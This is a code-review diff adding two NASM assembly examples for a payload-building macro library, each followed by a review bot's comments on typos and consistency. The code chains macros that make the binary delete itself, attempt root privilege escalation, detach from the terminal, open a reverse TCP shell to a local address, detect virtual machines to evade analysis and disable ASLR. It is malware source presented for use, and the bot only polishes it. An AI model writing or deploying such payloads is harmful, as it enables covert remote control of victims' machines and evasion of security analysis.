2 files changed, +22 -0 lines changed
1+ BITS 64
2+ %include "bmj.asm"
3+ section .text
4+ global _start
5+ _start:
6+ remove_self ; The binary removes itself if it's size is circa current payload size ('fsize' variable)
7+ set_priority MAX_PRIO ; We set process priority to maximum
8+ elevate_full ; Privilege escalation attempt via SETGID(0) ats SETUID(0)
9+ tty_detach ; setsid(0x00) == detach from controlling TTY device
10+ revshell "127.0.0.1" , 5555 ; Spawn a standard TCP reverse shell
11+ get_current_size_var ; Initiate the 'fsize' variable used by 'remove_self' macro
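Review bot: line 11 calls `get_current_size_var` after `remove_self` on line 6, yet its comment says it initiates the 'fsize' variable that `remove_self` uses, so as written the example reads like a use before initialization. If the macro has to come last because it derives the size at assembly time, say so in the comment; otherwise move it ahead of `remove_self`. The comment on line 6 should also state what tolerance "circa" means for the size comparison. Two typos to fix: "it's size" should be "its size" on line 6, and "ats" on line 8 looks like a stray word for "and".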
1+ BITS 64
2+ %include "bmj.asm"
3+ section .text
4+ global _start
5+ _start:
6+ nops 40
7+ flock ; Enforce only a single process instance of the payload running concurrently
8+ vm_age ; Check if the sample was launched inside VM by inspecting /etc/hostname STATX structure
9+ disable_aslr ; Disable ASLR for further use
10+ sock_connect "127.0.0.1" , 6666 ; Address for reverse TCP pingpack
11+ padd_byte 800 , 0x90 ; Padds the payload size with '0x90' to reach exactly 256 bytes in total after being composed by Nasm
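Review bot: the comment on line 11 says the padding brings the payload to exactly 256 bytes, but the call is `padd_byte 800 , 0x90`, so either the argument or the comment is wrong. Make the two agree and state whether the first argument is the target total size or the number of bytes added. `nops 40` on line 6 is the only macro call without a comment, and the `vm_age` comment on line 8 does not say what the payload does when the check indicates a VM. Typos: "pingpack" on line 10 and "Padds" on line 11.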